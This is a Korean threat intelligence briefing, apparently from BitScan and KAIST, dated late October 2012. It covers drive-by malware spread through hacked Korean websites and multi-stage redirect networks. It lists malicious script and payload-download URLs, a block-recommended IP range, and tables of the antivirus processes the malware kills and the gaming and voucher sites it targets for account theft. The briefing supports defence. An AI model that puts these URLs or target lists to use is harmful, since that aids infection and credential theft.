       본 정보제공 서비스는 공개, 재 배포 금지(내부에서만 활용), 비영리 목적으로만 활용 가능합니다. 공익적인 목적으로 기관에 제공되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

       시범 서비스는 순차적으로 1개월 경과 시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.

       정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/담당자/연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다.

       본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.

       본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre-Crime Detect System)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 정보보호대학원과 공동으로 진행합니다.

 

Posted by 바다란

댓글을 달아 주세요

 

[빛스캔+KAIST] 10 4주차 브리핑



 

 

한국 인터넷 위협분석 보고서 (수면 아래의 거대한 위협을 보라.)

 

빛스캔과 KAIST 정보보호대학원이 공동 운영하는 보안정보 제공 서비스 10 4주차 국내 인터넷 환경의 위협 분석내용이며 본 보고서는 PCDS( Pre Crime Detect System )의 탐지역량과 KAIST 정보보호대학원의 분석역량이 결집된 분석 보고서입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응 방안 제시를 하고 있습니다.

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영되고 있습니다. 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

 

         1.       악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

         2.       악성링크가 공격에 활용에 활용하는 주된 취약성에 대한 내부 보안 강화 정책패치

         3.       내부 감염된 APT 공격의 확인 및 제거에 활용(기술 분석 문서 참고)

 

보고서 내용 중에 기술분석 보고서에는 악성링크의 유형과 실제 감염을 시키는 악성코드의 타입에 따라 보고서가 기술되어 있습니다. 각각은 별개이므로 악성링크(사용자 PC에 악성코드를 내리기 위한 공격코드)에 대한 분석과 실제 악성코드 행위와 기능에 대한 분석 시에 참고 하세요. 각각의 악성링크의 분석에는 최종 다운로드 되는 악성코드까지 기술이 되어 있습니다.

 

 

*금주차는 아주대 및 기타 민감한 내용들이 모두 기사화 된 관계로 본 브리핑은 별도의 필터링 없이 공개 합니다.  평상시와 동일하게 IP 및 URL , 기타 민감한 정보들에 대해서는 삭제 및 Blur 처리 되어 있습니다. 




Summary

 

10 4주차는 10 3주차에 비해 주중 공격이 늘어났으며 특이하게 금요일보다 토요일에 오히려 공격이 훨씬 매서웠습니다. 관찰 결과 공격자들이 매우 능동적으로 악성링크 주소를 변경하는 것으로 관찰 되고 있습니다. 최초 악성링크는 물론이고 최종 악성파일에 대한 변화도 계속 되고 있어서 탐지가 어려운 상태가 계속 되고 있습니다. 주말과 주중 모두를 대응해야 하는 현재의 상황입니다. 3시간만에 100여곳의 웹서비스에 악성링크를 추가하는 공격자들, 기존에 활용되던 악성링크의 내용을 단 1~20분만에 모두 동일한 악성링크로 변경 할 수 있는 공격자들의 높은 수준의 자유도는 현재의 환경을 심각할 정도로 위협하고 있는 현실입니다.

 

기존에도 DDoS 공격을 수행할 수 있는 기능을 갖춘 봇 에이전트 역할의 악성코드가 9 4주차에 발견되었으나 이후에도 계속해서 10 2주차는 V3 아이콘으로 위장한 유사한 기능의 봇 에이전트 악성코드가 발견 되었고, 이번 10 4주차에도 봇 에이전트 악성코드가 또 다시 등장하였습니다. 9 2주차 보고서에서 보여드린 1:29:300의 하인리히 법칙은 유효합니다. 모든 대형 사고가 발생하기 이전에는 반드시 징후가 있으며 조짐들이 존재합니다.  준비하고 대비하지 않는다면 문제는 반드시 발생됩니다.

 



<금주에는 주중공격 증가, 이전과 다르게 금요일보다 토요일 집중 공격>

 

10 3주차에는 국내 최대 지상파 방송 웹사이트인 KBS(Korean Broadcasting System)에서 악성코드를 유포한 정황이 포착되어, 이슈의 특성상 심각성 환기 차원에서 정보제공이 되었으며, 해당 내용은 데일리시큐[1]와 보안뉴스[2]에 게재 되었습니다.

 

금주에는 두루누리 사회보험[3]에서 악성코드를 유포하는 다단계유포망(MalwareNet)으로 2주 연속 이용된 정황이 포착 되었습니다. 두루누리 사회보험은 신뢰를 기반으로 보험이라는 서비스를 제공하는 곳입니다. 이런 신뢰를 기반한 곳에서조차 악성코드를 유포한다면 보험 자체를 믿을 수 있겠습니까? 또한 사회적 약자들을 위한 곳들까지 정보를 탈취하는 도구로 이용되고 있는 상황이라면 그 사이트내의 데이터들은 이미 오래전 공격자들의 손에 들어가 또 다른 사고의 위험으로 즉시 전이될 때만을 기다리고 있을 것입니다. 이미 사건 사고가 발생 했는지도 모를 일입니다. 현재의 상황은 기본적인 신뢰를 제공해야 하는 곳들 조차도 악성코드유포를 위한 숙주로 이용되는 상황입니다. 공격자들의 공격은 지난주 KBS에서 악성코드를 유포한 데 이어 한층 더 노골적으로 변모하고 있습니다.

 

또한 본 정보제공 보고서를 작성하는 수요일에도 해당 링크에서는 악성코드를 유포하였다가 현재는 통계 페이지만 넣는 치밀함을 보이고 있습니다. 사람들의 접속량을 판단 후 가장 적합할 때 언제든 공격코드를 넣는 형태를 자주 보이고 있습니다. 주중의 공격도 계속 되고 있으며 저희쪽 공개 목록에서 제외된 악성링크들의 경우 미탐지로 인식을 하고 계속해서 활용하는 형태를 보이고 있어서 일정수준 이상 활용 수치를 보일 경우 유포지 및 경유지 모두에 대해서 본 브리핑을 통해 공개토록 하겠습니다.

 



<10 31(수요일) 00시경, 두루누리 사회보험에서 악성코드 유포 정황 포착>

 





<10 31(수요일) 01시경, 방문자들 통계를 수집하기 위한 페이지만 삽입 , 수시로 악성링크로 대체되어 활용 됨을 확인>

 

또 다른 악성코드를 유포한 곳은 아주대학교 입학처 웹서비스입니다. 아주대학교는 수도권내 대학교로서 2012 한국대학순위에서 13위를 차지하는 유명 대학교입니다. 이러한 아주대학교에서 9 2주차부터 104주차까지 7주연속 매주 빠지지 않고 악성코드를 유포하였습니다. 입학처 웹서비스 자체에서 방문자들에게 악성코드를 배포한다는 것은 입시철과 맞물려 심각한 위협이 될 수 있는 상황입니다

 

아주대학교 입학처 웹서비스에서 악성코드 유포가 탐지된 날짜는 9 10, 9 16, 9 17, 9 24, 9 30, 10 7, 10 15, 10 27, 10 28, 10 29일 입니다. 모두 최초 발견일들이며 매 일시마다 새로운 악성링크들이 추가 되어 공격에 이용 되었습니다. 즉 공격자가 자유자재로 웹서비스를 원격에서 컨트롤 함을 알 수 있습니다.

 



<10 29 00시경, 아주대학교에서 악성코드 유포 정황 포착>

 

또한 피자업계 최초로 코스닥 시장에 진입한 미스터 피자에서 악성코드를 유포한 정황이 포착 되었습니다. 또한 현재는 미국, 중국, 베트남 등 해외시장 매장을 운영하고 있기도 합니다. 악성코드를 유포하는 악성링크는 mrpizza.co.kr 메인 페이지와 주문을 위한 웹서버 모두에 추가 되어 있었으며 현재도 존재하고 있습니다.

 



<10 26 21시경, 미스터피자에서 악성코드 유포 정황 포착>

 

이외에도 언론사의 다양한 서비스를 통해서도 악성코드를 유포하는 행위가 발견 되었으며, 정체를 숨기기 위한 다양한 액션들이 발견 되었습니다. 해당 언론사는 뉴스토마토이며 해당 뉴스페이지 및 티비 페이지와 같은 핵심 세 곳의 웹소스에 추가된 정황이 발견되었습니다. 현재도 한곳은 정상으로 위장하여 남아 있는 상태를 확인 하였습니다. 해당 악성링크는 etomato.unitel.co.kr/js/top.js 이며 최종 악성링크는 173.245.86.201/pic/img.js 입니다. 최종 악성링크는 미스터피자 웹사이트에 추가된 악성링크와 동일한 링크가 되겠습니다. 해당 링크의 구조는 다음과 같습니다국내 사이트인 Unitel.co.kr 하위 도메인을 해킹하고 이 도메인을 이용해 동일 언론사로 위장하여 악성코드를 유포하는 정황을 확인 할 수 있습니다.



<최종 악성링크의 구조도- 현재는 없어서 그대로 기술함. 공격자 경고용>

 

예를 든곳에서 유포한 악성코드들은 모두 게임 계정 탈취 및 금융정보 탈취를 목적으로 하는 악성코드로 드러났습니다. 브라우저단에 BHO로 등록하여 이벤트를 체크하고 특정 사이트에 접근하여 정보를 입력할 경우 피싱사이트로 연결하거나 정보를 탈취하는 유형으로 확인 되고 있습니다국내사이트를 해킹하고 또 연관관계까지 고려하여 또 다른 사이트를 공격하는데 이용되는 지금의 상황은 무엇에 비교해야 할까요?..

 

일상생활과 가장 밀접한 곳들까지 공격자들은 적극적으로 활용을 하고 있으며 위협을 하고 있습니다. 주말 동안에만 국한된 문제에서 이젠 주중에도 일상적으로 공격이 발생 되고 있습니다. 영화를 받거나 지난 드라마를 파일로 받아서 시청 하거나, 피자를 주문하고, 인터넷 쇼핑을 하며, 동호회 홈페이지에서 소식을 보는 것과 같은 인터넷상의 일상적인 생활에도 악성코드와 공격자의 의지는 강력하게 투사 되고 있습니다. 금주에만 새로 생성된 악성링크들은 최소 300여 곳 이상의 주요한 웹서비스들에서 적극적으로 악성코드 유포를 시도 하였으며 그 피해는 클 것으로 예상 됩니다. 이젠 주중에도 공격은 일상적으로 일어납니다. 최종 악성파일은 짧게는 삼십분 주기로 변경을 하기도 하면서 보호단계를 농락하고 있습니다. 국가의 보호체계 및 민간의 보호체계를 비웃으며 넘나드는 공격자들을 이젠 더 가까이에서 느낄 수 있습니다.  

 

해외 이슈[4]로는 악성코드 제작자들이 자동분석체계를 우회하기 위해 마우스 버튼 동작을 통해서만 동작하게 하는 악성코드가 출현했다는 소식입니다. 악성코드 수는 넘쳐나는데 자동분석체계까지 우회하는 방법까지 등장한 상황으로 보아 공격자들의 절대적인 우위 상황은 지속되고 있습니다. 공격자들은 클릭 한 번에 수 많은 변종들을 만들어내지만 방어하는 입장에서는 이것을 모두 일일이 수동으로 분석하게 된다면 수적으로 엄청난 열세입니다.

 

현재 빛스캔에서 탐지하는 유형은 단순히 이메일을 통한 타켓형 APT가 아닌 웹서비스를 방문하는 모든 방문자를 대상으로 한 대규모 유포이며, 확산도가 높아서 위험성이 높은 상태입니다. 따라서 기업/기관별로 인터넷 접근시에 많은 보호대책을 적극 반영 하여 대응을 하셔야 할 것으로 보입니다. 기존 악성코드들의 분석 결과도 단순 게임계정 탈취에서 계속 변화하는 형태를 보이고 있어 앞으로의 변화를 가늠하기 어려운 상황입니다. 이미 농협의 사례를 통해 APT나 내부망을 공격 하는 악성코드가 가진 위험성과 파괴력은 충분히 경험을 한 상태이므로 현재 웹서비스를 통해 감염시도를 하는 악성코드 자체의 위험성은 높은 수준이라 할 수 있습니다.

 

금주 공격의 특징을 정리하면 다음과 같습니다.

 

          9 4주차, 10 2주차 이후 또다시 DDoS 공격 수행 악성코드 유포


          8 3주차 대거 관찰된 루트킷, 백도어 유형의 경우 금주 차 활동 계속부가적인 위험 증가(감염된 좀비PC들을 활용한 추가 위험이 발생할 수 있는 상태)

          APT 형태의 악성코드 유포 계속 - 권한 획득, 내부망 스캔, 추가 코드 다운을 위한 다운로더 다수 확인 지속

          MalwareNet( 다단계 유포통로)을 적극 활용한 루트킷 및 백도어의 유포 시도 활성화 적극적 으로 이용됨

 

          3.4 7.7 DDos 형태와 유사성을 지니는 다운로더 발견 ( 긴장을 늦춰선 안되겠습니다. 당장이라도 발생 가능한 상황입니다. 1:29:300 하인리히의 법칙을 상기하시기 바랍니다. 이미 대형사고가 발생하기 위한 전제조건은 모두 갖추어진 상황입니다. )

          최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 및 다양한 취약성을 공격하는 복합적인 형태 의 악성링크 공격 확대 계속. 다단계 유포 형태를 띄고 있으며, 탐지 및 추적에 어려움이 예상됨

          백신에 탐지 되지 않는 다운로더 및 백도어 형태의 악성코드 유포 계속

          게임 계정 이외에 문화상품권 및 게임 머니 거래 사이트에 대한 계정 탈취 형 악성코드 계속

          백신 업데이트 IP 주소 목록을 내장한 악성코드 발견 계속. 향후 추가적 피해 예상됨

 

* 사용자가 특정은행 접속시에 피싱 사이트로 유도하거나 HTML 내용을 변경하여 정보를 획득하는 형태의 악성코드들도 현재 다수 유포 되고 있는 온라인 게임 계정 탈취형 악성코드에 붙여진 부가기능이며 해당 기능들은 매우 적극적으로 이용이 되고 있습니다악성코드 확산을 통제할 수 있는 근본적인 대안과 대책들이 집중적으로 필요한 부분이라 할 수 있습니다.

 

* 최근 언론상에 많이 나타나고 있는 은행권에 대한 Host file 변조를 통한 피싱 공격은 이미 5, 6월 정보제공 서비스에서 언급을 드렸던 부분으로서 당시 상당수의 악성코드가 유포 되었을 것으로 추정되며, 이후 피해가 지금에서야 계속 드러나는 것으로 볼 수 있습니다. 백신들에 대한 업데이트 주소 변경 내용들도 마찬가지 입니다. 예상대로 직접적인 ARP 스푸핑 공격코드 출현하였으므로 피해 발생이 예상되며, 지금까지 설명한 사항 모두 이미 악성코드의 유포 단계에서 사전 분석되어 정보 제공이 된 내용입니다.

 

 

MalwareNet ( 범위와 변화)

 

- MalwareNet: 공격자들이 공격효과를 높이고 탐지를 회피하기 위해 활용하고 있는 악성코드 유포 네트워크를 의미합니다. 일반적인 사이트에 악성링크를 직접 입력하는 것이 아닌 몇 단계를 거친 링크들을 입력하여 추적을 회피하고 악성코드 유포 효과를 극대화 하기 위해 사용되는 프레임을 MalwareNet으로 정의하고 있습니다. , 단 한번 악성링크의 내용을 변경하면 최대 300에서 최소 10여 곳에 이르기까지 동시에 동일한 악성코드 유포가 발생되는 상황을 나타내고 있습니다.

 

다단계유포망(MalwareNet)은 유통구조 패러다임의 혁신입니다.

우리가 주변에서 자주 볼 수 있듯이 우리가 '김치'를 먹기 위해서는 생산자가 밭에 배추 씨를 뿌립니다. 배추가 병충해 피해를 입지 않도록 잘 관리 후에 농수산물 도매시장에 판매합니다. 도매시장에서는 도매상들이 경매를 통해 큰 단위로 배추를 삽니다. 도매상들은 소매상들에게 다시 판매를 합니다. 소매상들은 다시 소비자들에게 판매합니다.

우리나라의 복합적인 유통 생태계입니다. 각 생산자,   도매상, 소매상 등의 중간 마진, 유통시간 등이 포함되어 있습니다.

 

생산자 : 농부

도매상 : 농수산물 도매시장(가락시장)

소매상 : 소매점포(일반 과일 가게)

소비자 : 일반 구매자

 



<악성코드 유포 패러다임과 유통 생태계(피라미드)>

 

하지만 현재 온라인에서 공격자들이 행하는 악성코드 유포는 유통구조의 근본적인 패러다임을 바꾸어 놓고 있습니다.

오프라인 유통 구조에서는 배추 씨앗을 뿌리고 수확하는데 일정한 주기(몇 개월)가 필요합니다. 하지만 온라인에서는 씨앗(악성코드)을 뿌림과 동시에 자라납니다. 그리하여 씨앗은 언제든지 변경할 수 있습니다.

 

중간마진 Zero, 유통시간 Zero, 판매효과는 즉시 ( 최소 10명중 6명에게는 강제판매 가능 )

생산자 : 최종 악성코드

도매상 : MalwareNet(동일한 경로를 활용한 유포 통로)

소매상 : 악성코드 경유지(언론사나 파일 공유 사이트 등)

소비자 : 방문자

 



<MalwareNet 다단계 악성코드 유포 경로>

 

본 정보제공 서비스에서는 MalwareNet의 특성상 대규모 피해가 상시적으로 발생될 수 있으므로 상위 리스트에 한해 부분 공개를 하고 있습니다.

 

MalwareNet을 통해 영향력을 가지는 악성링크들은 탐지 회피를 위해 비정기적이고 수시로 변경됩니다. 금주 차에서는 사후 대응으로는 탐지할 수 없는 형태인 MalwareNet의 활용 사례를 살펴 보겠습니다. 공격자의 의도에 의해 조종당하고 있는 현실에서 사후대응과 사전대응의 차이는 매우 큰 차이를 가질 수 밖에 없으며 , 선제적인 사전대응이 얼마나 중요한지 확인 할 수 있습니다. MalwareNet 자체를 여러 곳 활용하는 형태도 전주에 이어 계속 발견되고 있으며, 금주에는 http://www.xxxxxxx.com/test/js.js 이 적극적으로 이용이 되고 있는 상황입니다. 또한 악성코드의 효율적인 확산을 위해 이미 사전에 확보해둔 여러 MalwareNet들이 수시로 이용이 되고 있으며 다단계 형식의 확산을 통해 최종 확산 범위 유추가 어렵도록 공격자들은 많은 노력을 기울이고 있습니다

 

해당 MalwareNet 통로는 현재 시간에도 영향력을 유지하고 있으므로 대응이 필요하며 수시로 최종 악성코드들이 변경되고 있어서 탐지 및 대응에 어려움이 있을 것으로 판단됩니다. 최종 악성코드들에 대한 탐지율도 높지 않아 항상 위험에 노출 되어 있는 상태라 볼 수 있습니다. 단기간에 대규모 유포망 구축을 하는 형태가 끊임없이 관찰이 되고 있습니다. 주중에는 통계정보를 수집하고 간헐적으로 공격에도 이용 되고 있는 형태를 보이고 있습니다. 평상시에는 해당 링크가 존재하지 않다가 공격 시점에만 활성화되고 있는데 이 점은 공격자가 해당 서비스에 대한 완벽한 권한을 행사하고 있음을 의미 합니다. 단순한 링크 삭제로는 해결책이 되지 않음을 염두에 두어야 할 것입니다.

 


 

*이번주는 특별히 다단계유포망(MalwareNet)에 들어있는 링크가 얼마나 수시적으로 변하는지 알아보았습니다. 현재 악성코드 유포통로는 xxxxxxx.com/test/js.js 동일합니다. 하지만 그 안에 들어있는 악성링크 혹은 MalwareNet들은 비정기적이며 수시적으로 변합니다. 빠르면 3시간에 한 번씩 바뀌고 그 악성링크 안에는 백신에 탐지되지 않는 악성코드들이 사용자들을 감염 시킵니다.

 

현재의 상황은 사용자 PC에 설치되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐하고 있습니다. 기본적인 문제를 해결할 수 있는 보안패치는 반드시 적용해야만 위험을 줄일 수 있으니 반드시 기관/ 기업 내부적으로 강력한 권고가 되어야 합니다. Oracle Java취약성, Adobe Flash 취약성, MS XML, Midi IE 취약성이 복합적으로 사용되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록 등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하시기 바랍니다.

 

기술 분석 보고서에 전체 URL이 공개된 국내 사이트들은 악성링크로 직접 이용 되거나 최종 악성코드가 다운로드 된 곳들의 주소는 여과 없이 공개가 되고 있으니 참고하시고 금주 차에는 언론사 및 국내 기업, 기관들의 주소가 직접 기술 되어 있습니다.

 

기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있습니다. 현재 가장 다수를 차지하는 게임계정 탈취형 악성코드들이 변화된 형태를 보이고 있으며 현재는 금융관련된 거래시에 피싱사이트로 연결 되도록 기능 추가가 다수 되어 있는 상태이며, 계속해서 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 계속 되고 있습니다. – 8 2주차부터 알려드린 정보들은 날이 갈수록 변화의 폭과 강도가 높아지고 있어서 즉시적인 대응책이 절실한 상황입니다.

 

 

PCDS(Pre-Crime Detect System) 탐지 내역

 

PCDS 상에서는 최초 악성링크 탐지와 MalwareNet에 대한 추적, 최종 악성파일에 대한 수집까지 같이 운영이 되고 있습니다.

 

PCDS에 탐지된 내용을 바탕으로 하여 공격자들의 전략을 확인해 보면, 비정기적이고 수시로 악성링크와 최종 악성코드를 바꾸고 있습니다. 변경하는 이유는 백신 탐지 회피를 하기 위한 목적이 가장 크며, 때로는1시간에 한 번씩 최종 악성코드를 변경하는 지금의 상황에서 대응이 가능한 보안체계는 거의 없습니다. 백신은 백신만의 역할 부분이 있으며, 현재 상태의 문제 해결을 위해서는 확산 이전에 대응을 할 수 있어야 합니다. 최종 설치되는 바이너리의 변화는 계속 되고 있으므로, 대응적인 측면에서 한계를 보일 것으로 판단됩니다.

 





<빛스캔 PCDS를 활용한 금일에도 살아있는 악성링크를 통해 수집된 최종 악성코드 2012.10.31 15:00>

 

* 최종 바이너리 수집의 경우 체크섬 값이 다르거나 변경이 되었을 때 수집이 되도록 되어 있으며 위의 항목은 빠르면 1시간 이내에도 최종 파일을 변경하는 형태를 직접 볼 수 있습니다. 이와 같은 악성코드들이 순식간에 수십여 곳의 서비스를 통해 즉시 감염을 시키고 있는 것이 현실입니다. 공격자들의 전술과 기동력은 타의추종을 불허합니다. 그 반면 대응은 어떤가요? 현재의 실상은 과연 어떨까요?  마치 중세시대의 유럽을 점령 하였던 몽골기병을 보는듯한 기동력과 파괴력은 한국의 인터넷을 휩쓸고 있지만 마땅히 대응을 할 방안은 현재로서 없어 보입니다

* http://www.zdnet.co.kr/column/column_view.asp?artice_id=20120326083127

 

지금 분석되고 예상되는 모든 내용들은 지금 이 순간에도 발생하고 있는 현실입니다. 사건이 발생 된 이후에는 돌이키기 어렵듯이 사전 탐지와 사후 대응은 전혀 다른 범위입니다. 사전에 얼마나 대응을 하느냐가 가장 중요하며, 빠른 정보를 확보하여 대규모로 유포된 악성코드에 대응 할 수 있도록 사후대응 측면에서도 현재 수준 보다는 강도 높은 방안들이 절실히 요구됩니다.

 

 

게임 계정 탈취 및 백신 Kill, 게임 머니 및 아이템 거래 사이트 계정탈취 계속

 

본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되었습니다모든 기능은 BHO 관련된 공격에 연관 되어 있으며 해당 문제들은 이전 보고서에 첨부된 BHO 공격에 대한 전문분석 자료를 참고 하세요. ( 정식구독 기업/기관 대상)신규 가입 및 최근가입으로 인하여 전문분석 보고서를 받지 못한 곳들은 본 메일로 회신을 주시면 전달 드리겠습니다.

 

9 1주차부터 신용정보 조회, 아이템 매니아, 아이템 베이 사이트까지 계정 탈취 기능이 추가 되었습니다. 신용정보 조회 사이트에서 자신의 신용정보를 검색하다가는 자신의 개인정보가 노출될 수도 있습니다. 또한 아이템 매니아, 아이템 베이 사이트는 온라인 게임 아이템 거래 사이트입니다. 게임 계정을 탈취해서 아이템을 판매하던 공격자들이 이제는 게임 계정 탈취 이외에도 게임 아이템 거래 사이트까지 노리고 있습니다돈이 되는 곳은 모두가 대상이 되어 있는 상태입니다. 다른 모든 기기와 장비들에서도 금전화가 가능한 순간부터 현재의 공격 수준은 그대로 확장이 될 것입니다. 아직은 때가 안되었을 뿐입니다. 그 때는 머지 않았습니다.

 

악성코드는 최초에 PC에 설치된 백신들과 같은 보호 프로그램들을 무력화 시키고 시스템에 발견하기 어렵고 제거가 어려운 악성코드들을 확실하게 심어 둡니다. 그 이후에 돈이 될만한 모든 정보들은 공격자가 확보한 사이트로 전달이 됩니다. 때로는 원격에서 직접 통제하기도 하면서 말입니다.

 

1.        백신 무력화

 

프로세스명

프로그램명

sgbider.exe, vcsvc.exe, vcsvcc.exe

바이러스체이서

NVCAgent.npc, Nsvmon.npc, Nsavsvc.npc, NVC.npc, NaverAgent.exe

네이버백신

V3sp.exe, V3svc.exe, V3up.exe, MUpdate2.exe, SgSvc.exe, Sgui.exe, SgRun.exe, InjectWinSockServiceV3.exe, V3Light.exe, V3LTray.exe, V3Lsvc.exe, V3LRun.exe

AhnLab V3

AhnLab V3 Lite

AhnLab SiteGuard

AYUpdSrv.aye, AYRTSrv.aye, SkyMon.exe, AYServiceNT.aye, AYupdate.aye, AyAgent.aye

알약 (ALYac)

avp.exe

Kaspersky

avgnt.exe, avcenter.exe, avguard.exe, avscan.exe, avupgsvc.exe

Avira AntiVirus

avwsc.exe, AvastSvc.exe, ashUpd.exe, AvastUI.exe

avast!

shstat.exe, Mctray.exe, UdaterUI.exe

McAfee

msseces.exe

MSE

egui.exe, ekrn.exe

ESET NOD32

ccSvcHst.exe, Navw32.exe

Symantec Norton

updatesrv.exe, vsserv.exe, seccenter.exe, bdagent.exe, bdreinit.exe

BitDefender

avgam.exe, avgemc.exe, avgnsx.exe, avgrsx.exe, avgfrw.exe, avgwdsvc.exe, avgupd.exe

AVG

PCOTP.exe

넥슨 OTP

 

2.     게임 계정 탈취

 

프로세스명

프로그램명

gamehi.co.kr

게임하이

hangame.com, id.hangame.com

한게임

laspoker.exe

한게임 라스베가스포커

duelpoker.exe

한게임 맞포커

hoola3.exe

한게임 파티훌라

highlow2.exe

한게임 하이로우

poker7.exe

한게임 7포커

baduki.exe

한게임 로우바둑이

ExLauncher.exe, TERA.exe, tera.hangame.com

테라

netmarble.net

넷마블

pmang.com

피망

ff2client.exe, fifaonline.pmang.com

피파 온라인2

Raycity.exe

레이시티

www.nexon.com, login.nexon.com

넥슨

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

baramt.exe, WinBaram.exe, baram.nexon.com

바람의 나라

mabinogi.nexon.com, heroes.nexon.com, heroes.exe

마비노기 영웅전

MapleStory.exe, maplestory.nexon.com

메이플 스토리

x2.exe, elsword.nexon.com

엘소드

dk.halgame.com, dkonline.exe

DK 온라인

clubaudition.ndolfin.com

클럽 오디션

www.capogames.net, samwinfo.capogames.net

삼국지w

fairyclient.exe

로한

plaync.co.kr

엔씨소프트

bns.plaync.com

블레이드 & 소울

lin.bin

리니지

AION.bin, aion.plaync.jp

아이온

kr.battle.net

블리자드 배틀넷

wow.exe

월드 오브 워크래프트

Diablo III.exe

디아블로III

 

 

3.     게임 머니 & 게임 아이템 & 문화상품권 계정 탈취

 

사이트 주소

사이트 이름

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시

auth.siren24.com

신용정보 조회

itemmania.com

아이템 매니아

www.itembay.com

아이템 베이

 

* URL의 경우는 브라우저 상에서 BHO (Browser Helper Object)로 등록이 되어 모니터링을 하다가 해당 URL로 주소가 입력이 되거나 접속이 될 경우에 html 내용을 변조 하거나 계정에 관련된 키 입력값을 빼내도록 고안이 된 상황입니다.

 

 

차단 권고 대역

 

아래 영역은 이미 공격자가 권한을 통제하고 있는 IP대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재 활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다. 악성링크에 이용 되는 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해 강력한 차단을 유지하실 것을 권고 합니다.

 

          기술 분석 보고서에는 별도의 차단 대역들을 제공하고 있으므로 참고하시기 바라며, 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

          국내 통신사의 경우 C Class가 아닌 직접 IP를 등록 하였으며 이미 공격자가 권한을 가진 상태에서 악성코드 유포 경로로 직접 활용하고 있는 상태여서 제한적인 차단이 필요하며, 업무와 연관성이 있는지 여부는 각 기업 및 기관에서 잘 판단 하셔서 차단에 활용하시기 바랍니다. 9 4주차부터 차단 권고 대역은 최근 1~2개월을 기준으로 전달 드리도록 하겠습니다. 이전의 차단 목록이 필요한 기업 및 기관은 로 요청해 주 세요.

 

- 205.165.0.X THE.NET, TEXAS, USA 10/4


 

악성코드 감염 이후 접속 URL - 차단 및 모니터링 필요한 부분

 

본 내용은 악성코드가 PC에 감염된 이후에 외부로 연결 시도를 하고 명령을 받는 주소들입니다. C&C 연결 을 시도하는 봇넷과 같은 개념으로 볼 수 있습니다. C&C 서버의 차단과 관련된 핵심적인 내용입니다. 차후 별도 차단 서비스를 기획하고 있으며 해당 내용은 별도 서비스 확산 시에 보고서 상에서만 일부 제공될 예정입니다. 실험적으로 Outbound 연결 시에 Destination IP가 본 URL일 경우는 100% 좀비 PC및 백도어, 루트킷 등에 감염된 것이므로 직접 내부망에서 감염된 좀비 PC를 찾아내는 것이 가능해 집니다. 기술 분석 보고서 내에는 추가적인 차단 정보들이 존재함으로 확인 하시고 적용 하시는 것이 필요합니다.

 


 

추가로 악성 파일을 다운로드하는 경로 즉시 대응 필요


http://up.nvyqmu.com/update/witer2.rar

http://up.nvyqmu.com/update/witer1.rar

http://up.tblmry.com/update/witer2.rar

http://up.tblmry.com/update/witer1.rar

http://up.sjpywj.com/update/witer2.rar

http://up.sjpywj.com/update/witer1.rar

http://up.plrxoo.com/update/witer2.rar

http://up.plrxoo.com/update/witer1.rar

 

* 붉은색으로 선택된 도메인들은 모두 현재 다수가 국내 환경에 뿌려져 있는 다운로더 및 C&C 서버로 이용되는 파일 및 도메인들입니다. 해당 도메인은 불시에 활성화 되어 추가적인 피해가 계속 될 수 있으므로 본 메일을 받으시는 기관 및 기업에서는 그에 맞는 대응을 하시기 바랍니다. 기업은 해당 도메인으로 접속하는 PC가 있을 경우 이미 좀비 PC화가 되었으므로 절차에 맞게 처리를 하시면 되고 국가기관 차원에서는 차단 정책을 즉시 수행 하여야 할 것으로 보입니다.

 

